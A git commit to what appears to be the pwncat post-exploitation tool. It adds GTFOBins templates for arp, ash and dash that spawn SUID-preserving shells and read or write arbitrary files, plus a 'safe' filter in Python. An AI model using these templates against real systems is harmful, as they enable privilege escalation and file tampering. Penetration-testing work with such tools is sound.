Added "safe" property to gtfobins and started to add more GTFObins

2024-11-24 01:25:37 +01:00 · 2020-05-09 18:36:51 -04:00 · 2020-05-09 18:36:51 -04:00 · bebe20dcfb
commit bebe20dcfb
parent 86e6397702
2 changed files with 42 additions and 1 deletions
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@ -38,5 +38,36 @@
 	{
 		"name": "cat",
 		"read_file": "{path} {lfile}"
+	},
+	{
+		"name": "arp",
+		"read_file": "{path} -v -f {lfile} 2>&1 | while read line; do substring=\"\"; if ! test \"${{line#*arp}}\" != \"$line\"; then echo ${{line#>> }}; fi; done",
+		"safe":false
+	},
+	{
+		"name": "ash",
+		"shell": {
+			"script": "{command}", 
+			"suid": ["-p"]
+		},
+		"read_file": "{path} -p -c \"cat {lfile}\"",
+		"write_file": {
+			"type": "base64",
+			"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
+		},
+		"command": "{path} -p -c {command}"
+	},
+	{
+		"name": "dash",
+		"shell": {
+			"script": "{command}", 
+			"suid": ["-p"]
+		},
+		"read_file": "{path} -p -c \"cat {lfile}\"",
+		"write_file": {
+			"type": "base64",
+			"payload": "{path} -p -c \"echo -n {data} | base64 -d > {lfile}\""
+		},
+		"command": "{path} -p -c {command}"
 	}
 ]
--- a/pwncat/gtfobins.py
+++ b/pwncat/gtfobins.py
@ -262,6 +262,11 @@ class Binary:
        """ Check if this binary has a write_file capability """
        return "write_file" in self.data

+    @property
+    def is_safe(self):
+        """ Check if this binary has a write_file capability """
+        return self.data.get("safe", True)
+
    def command(self, command: str) -> str:
        """ Build a payload to execute the specified command """

@ -298,7 +303,10 @@ class Binary:

    @classmethod
    def find_capability(
-        cls, which: Callable[[str], str], capability: int = Capability.ALL
+        cls,
+        which: Callable[[str], str],
+        capability: int = Capability.ALL,
+        safe: bool = False,
    ) -> "Binary":
        """ Locate the given gtfobin and return the Binary object. If name is
        not given, it is assumed to be the basename of the path. """
@ -309,6 +317,8 @@ class Binary:
                continue

            binary = Binary(path, data)
+            if not binary.is_safe == safe:
+                continue
            if not binary.has_read and (capability & Capability.READ):
                continue
            if not binary.has_write and (capability & Capability.WRITE):